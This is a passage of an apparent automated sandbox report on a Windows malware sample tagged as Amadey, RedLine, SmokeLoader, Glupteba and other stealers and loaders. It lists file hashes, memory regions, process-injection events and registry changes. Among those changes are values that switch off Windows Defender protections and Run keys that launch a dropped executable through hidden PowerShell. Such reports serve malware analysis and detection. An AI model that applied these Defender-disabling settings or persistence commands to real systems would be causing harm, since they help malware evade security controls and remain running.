memory/2236-307-0x0000000002A90000-0x000000000337B000-memory.dmp

memory/2844-308-0x0000000001350000-0x0000000001A3F000-memory.dmp

memory/2844-309-0x0000000000910000-0x0000000000FFF000-memory.dmp

memory/2844-310-0x0000000000910000-0x0000000000FFF000-memory.dmp

memory/2844-311-0x0000000000910000-0x0000000000FFF000-memory.dmp

memory/1320-313-0x0000000003130000-0x0000000003357000-memory.dmp

memory/2304-319-0x0000000001F60000-0x000000000264F000-memory.dmp

memory/320-318-0x0000000000CA0000-0x0000000000EC7000-memory.dmp

memory/1688-317-0x0000000074610000-0x0000000074CFE000-memory.dmp

memory/2156-316-0x000000001B1B0000-0x000000001B230000-memory.dmp

memory/2236-323-0x0000000000400000-0x0000000000D1B000-memory.dmp

memory/2096-322-0x000000013F5F0000-0x0000000140100000-memory.dmp

memory/320-315-0x0000000000CA0000-0x0000000000EC7000-memory.dmp

memory/320-314-0x0000000000400000-0x0000000000627000-memory.dmp

memory/320-325-0x0000000000400000-0x0000000000627000-memory.dmp

memory/1320-312-0x0000000003130000-0x0000000003357000-memory.dmp

memory/2236-326-0x0000000000400000-0x0000000000D1B000-memory.dmp

memory/1688-327-0x00000000002D0000-0x00000000002DA000-memory.dmp

memory/1688-328-0x00000000002E0000-0x00000000002E8000-memory.dmp

memory/1688-329-0x00000000051A0000-0x0000000005332000-memory.dmp

memory/1688-335-0x0000000004C90000-0x0000000004CD0000-memory.dmp

memory/1688-336-0x0000000004C90000-0x0000000004CD0000-memory.dmp

memory/1688-337-0x0000000004C90000-0x0000000004CD0000-memory.dmp

memory/1688-334-0x0000000000320000-0x0000000000330000-memory.dmp

memory/1688-338-0x0000000004C90000-0x0000000004CD0000-memory.dmp

memory/1688-339-0x0000000004C90000-0x0000000004CD0000-memory.dmp

memory/1688-340-0x0000000004C90000-0x0000000004CD0000-memory.dmp

memory/1688-341-0x0000000004C90000-0x0000000004CD0000-memory.dmp

memory/1688-343-0x0000000004C90000-0x0000000004CD0000-memory.dmp

memory/1688-345-0x0000000074610000-0x0000000074CFE000-memory.dmp

memory/1688-346-0x0000000004C90000-0x0000000004CD0000-memory.dmp

memory/2156-347-0x000007FEF5B20000-0x000007FEF650C000-memory.dmp

memory/2728-350-0x0000000000400000-0x000000000041B000-memory.dmp

memory/2728-351-0x0000000000400000-0x000000000041B000-memory.dmp

memory/2728-352-0x0000000000400000-0x000000000041B000-memory.dmp

memory/2728-353-0x0000000000400000-0x000000000041B000-memory.dmp

memory/2728-354-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/2728-356-0x0000000000400000-0x000000000041B000-memory.dmp

memory/2728-358-0x0000000000400000-0x000000000041B000-memory.dmp

memory/2728-361-0x0000000000400000-0x000000000041B000-memory.dmp

memory/2236-373-0x0000000000400000-0x0000000000D1B000-memory.dmp

memory/2096-376-0x000000013F5F0000-0x0000000140100000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1ZACESTD47PO9LVCFEY1.temp

MD5 2d7b98b99eeaf5026fe7ebf719363e4b
SHA1 8e5dfd98380399fd484a2f8b05e929fae81d87d1
SHA256 3600a7192dbf23647543a82c31343993c9fd7b00e04c7d7f487476ed888f2cd2
SHA512 00dc39493b07eedb66acf9e8b8d40239019e980613098be4aed4dba0dd3f03da505df2f909fa829c2d3fb408847789ff8249443dd0f16bcbeff28bb8e0dac360

memory/2244-392-0x00000000027A0000-0x0000000002B98000-memory.dmp

memory/320-414-0x0000000000400000-0x0000000000627000-memory.dmp

memory/2536-430-0x000000013F770000-0x000000013FD11000-memory.dmp

memory/2360-432-0x0000000000080000-0x00000000000BE000-memory.dmp

memory/2360-434-0x0000000000080000-0x00000000000BE000-memory.dmp

memory/2360-435-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\nfIxQMeJQCLipql\AKYoIfz.exe

MD5 cd3191644eeaab1d1cf9b4bea245f78c
SHA1 75f04b22e62b1366a4c5b2887242b63de1d83c9c
SHA256 f626f7361d341ca2b7c67c2b20ca5ab516a6ce4104048c5a3ee3f2d83cc3039f
SHA512 79ebd59d2f66bf3f4417760ff1c9021b3d0e3dcb65da390bf377c3316ce675add82b79bd90750e9b98f68bd5a5625c2b863fadbd0bf447c372b14a619e43d57a

C:\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

MD5 1afff8d5352aecef2ecd47ffa02d7f7d
SHA1 8b115b84efdb3a1b87f750d35822b2609e665bef
SHA256 c41acc53cde89b94d55d6932ddd55a212ba910e1fade3da138670bb5b18ae4e1
SHA512 e5dc54c60be702e11772dc729eec5ec7140f293545aa3d57282adacddf686483393b0c940bbd397a9d50a6cda093865b143ae00c51ce3bf5d6b00241f97b3cdb

C:\Users\Admin\AppData\Local\Temp\Cab3832.tmp

MD5 f3441b8572aae8801c04f3060b550443
SHA1 4ef0a35436125d6821831ef36c28ffaf196cda15
SHA256 6720349e7d82ee0a8e73920d3c2b7cb2912d9fcf2edb6fd98f2f12820158b0bf
SHA512 5ba01ba421b50030e380ae6bbcd2f681f2a91947fe7fedb3c8e6b5f24dce9517abf57b1cf26cc6078d4bb53bde6fcfb2561591337c841f8f2cb121a3d71661b9

C:\Users\Admin\AppData\Local\Temp\Tar3B8F.tmp

MD5 9441737383d21192400eca82fda910ec
SHA1 725e0d606a4fc9ba44aa8ffde65bed15e65367e4
SHA256 bc3a6e84e41faeb57e7c21aa3b60c2a64777107009727c5b7c0ed8fe658909e5
SHA512 7608dd653a66cd364392a78d4711b48d1707768d36996e4d38871c6843b5714e1d7da4b4cc6db969e6000cfa182bcb74216ef6823d1063f036fc5c3413fb8dcf

C:\Program Files\Google\Chrome\updater.exe

MD5 bae29e49e8190bfbbf0d77ffab8de59d
SHA1 4a6352bb47c7e1666a60c76f9b17ca4707872bd9
SHA256 f91e4ff7811a5848561463d970c51870c9299a80117a89fb86a698b9f727de87
SHA512 9e6cf6519e21143f9b570a878a5ca1bba376256217c34ab676e8d632611d468f277a0d6f946ab8705121002d96a89274f38458affe3df3a3a1c75e336d7d66e2

Analysis: behavioral2

Detonation Overview

Submitted

2023-10-25 05:11

Reported

2023-10-25 05:13

Platform

win10v2004-20231020-en

Max time kernel

67s

Max time network

144s

Command Line

"C:\Users\Admin\AppData\Local\Temp\dfd8798cfe88efc66b69d0be9671d323.exe"

Signatures

Amadey

trojan amadey

DcRat

rat infostealer dcrat
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\3334.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\3334.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\3334.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\3334.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\3334.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\3334.exe N/A

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

ZGRat

rat zgrat

Downloads MZ/PE file

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3350690463-3549324357-1323838019-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\34AC.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350690463-3549324357-1323838019-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A

Windows security modification

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features C:\Users\Admin\AppData\Local\Temp\3334.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\3334.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\2EEB.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\nI0rA6wA.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ve8yU8rb.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\wB2pn4Fi.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\tm6xy0Sw.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3350690463-3549324357-1323838019-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\socks5 = "powershell.exe -windowstyle hidden -Command \"& 'C:\\Users\\Admin\\AppData\\Local\\Temp\\B42F.exe'\"" C:\Users\Admin\AppData\Local\Temp\B42F.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\3334.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3692 wrote to memory of 1284 N/A C:\Users\Admin\AppData\Local\Temp\dfd8798cfe88efc66b69d0be9671d323.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3692 wrote to memory of 1284 N/A C:\Users\Admin\AppData\Local\Temp\dfd8798cfe88efc66b69d0be9671d323.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3692 wrote to memory of 1284 N/A C:\Users\Admin\AppData\Local\Temp\dfd8798cfe88efc66b69d0be9671d323.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3692 wrote to memory of 1284 N/A C:\Users\Admin\AppData\Local\Temp\dfd8798cfe88efc66b69d0be9671d323.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3692 wrote to memory of 1284 N/A C:\Users\Admin\AppData\Local\Temp\dfd8798cfe88efc66b69d0be9671d323.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3692 wrote to memory of 1284 N/A C:\Users\Admin\AppData\Local\Temp\dfd8798cfe88efc66b69d0be9671d323.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3340 wrote to memory of 3044 N/A N/A C:\Users\Admin\AppData\Local\Temp\2EEB.exe
PID 3340 wrote to memory of 3044 N/A N/A C:\Users\Admin\AppData\Local\Temp\2EEB.exe
PID 3340 wrote to memory of 3044 N/A N/A C:\Users\Admin\AppData\Local\Temp\2EEB.exe
PID 3340 wrote to memory of 2360 N/A N/A C:\Users\Admin\AppData\Local\Temp\3034.exe
PID 3340 wrote to memory of 2360 N/A N/A C:\Users\Admin\AppData\Local\Temp\3034.exe
PID 3340 wrote to memory of 2360 N/A N/A C:\Users\Admin\AppData\Local\Temp\3034.exe
PID 3044 wrote to memory of 2760 N/A C:\Users\Admin\AppData\Local\Temp\2EEB.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\nI0rA6wA.exe
PID 3044 wrote to memory of 2760 N/A C:\Users\Admin\AppData\Local\Temp\2EEB.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\nI0rA6wA.exe
PID 3044 wrote to memory of 2760 N/A C:\Users\Admin\AppData\Local\Temp\2EEB.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\nI0rA6wA.exe
PID 2760 wrote to memory of 496 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\nI0rA6wA.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ve8yU8rb.exe
PID 2760 wrote to memory of 496 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\nI0rA6wA.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ve8yU8rb.exe
PID 2760 wrote to memory of 496 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\nI0rA6wA.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ve8yU8rb.exe
PID 3340 wrote to memory of 2496 N/A N/A C:\Windows\system32\cmd.exe
PID 3340 wrote to memory of 2496 N/A N/A C:\Windows\system32\cmd.exe
PID 496 wrote to memory of 1120 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ve8yU8rb.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\wB2pn4Fi.exe
PID 496 wrote to memory of 1120 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ve8yU8rb.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\wB2pn4Fi.exe
PID 496 wrote to memory of 1120 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ve8yU8rb.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\wB2pn4Fi.exe
PID 3340 wrote to memory of 3908 N/A N/A C:\Users\Admin\AppData\Local\Temp\3268.exe
PID 3340 wrote to memory of 3908 N/A N/A C:\Users\Admin\AppData\Local\Temp\3268.exe
PID 3340 wrote to memory of 3908 N/A N/A C:\Users\Admin\AppData\Local\Temp\3268.exe
PID 1120 wrote to memory of 1072 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\wB2pn4Fi.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\tm6xy0Sw.exe
PID 1120 wrote to memory of 1072 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\wB2pn4Fi.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\tm6xy0Sw.exe
PID 1120 wrote to memory of 1072 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\wB2pn4Fi.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\tm6xy0Sw.exe
PID 3340 wrote to memory of 2308 N/A N/A C:\Users\Admin\AppData\Local\Temp\3334.exe
PID 3340 wrote to memory of 2308 N/A N/A C:\Users\Admin\AppData\Local\Temp\3334.exe
PID 3340 wrote to memory of 2308 N/A N/A C:\Users\Admin\AppData\Local\Temp\3334.exe
PID 1072 wrote to memory of 3132 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\tm6xy0Sw.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1iN14Uw1.exe
PID 1072 wrote to memory of 3132 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\tm6xy0Sw.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1iN14Uw1.exe
PID 1072 wrote to memory of 3132 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\tm6xy0Sw.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1iN14Uw1.exe
PID 3340 wrote to memory of 2412 N/A N/A C:\Users\Admin\AppData\Local\Temp\34AC.exe
PID 3340 wrote to memory of 2412 N/A N/A C:\Users\Admin\AppData\Local\Temp\34AC.exe
PID 3340 wrote to memory of 2412 N/A N/A C:\Users\Admin\AppData\Local\Temp\34AC.exe
PID 2496 wrote to memory of 2364 N/A C:\Windows\system32\cmd.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2496 wrote to memory of 2364 N/A C:\Windows\system32\cmd.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2496 wrote to memory of 1396 N/A C:\Windows\system32\cmd.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2496 wrote to memory of 1396 N/A C:\Windows\system32\cmd.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2364 wrote to memory of 456 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2364 wrote to memory of 456 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1396 wrote to memory of 3936 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1396 wrote to memory of 3936 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2412 wrote to memory of 3524 N/A C:\Users\Admin\AppData\Local\Temp\34AC.exe C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
PID 2412 wrote to memory of 3524 N/A C:\Users\Admin\AppData\Local\Temp\34AC.exe C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
PID 2412 wrote to memory of 3524 N/A C:\Users\Admin\AppData\Local\Temp\34AC.exe C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
PID 3524 wrote to memory of 1816 N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe C:\Windows\SysWOW64\schtasks.exe
PID 3524 wrote to memory of 1816 N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe C:\Windows\SysWOW64\schtasks.exe
PID 3524 wrote to memory of 1816 N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe C:\Windows\SysWOW64\schtasks.exe
PID 3524 wrote to memory of 3892 N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe C:\Windows\SysWOW64\cmd.exe
PID 3524 wrote to memory of 3892 N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe C:\Windows\SysWOW64\cmd.exe
PID 3524 wrote to memory of 3892 N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe C:\Windows\SysWOW64\cmd.exe
PID 2364 wrote to memory of 4660 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2364 wrote to memory of 4660 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2364 wrote to memory of 4660 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
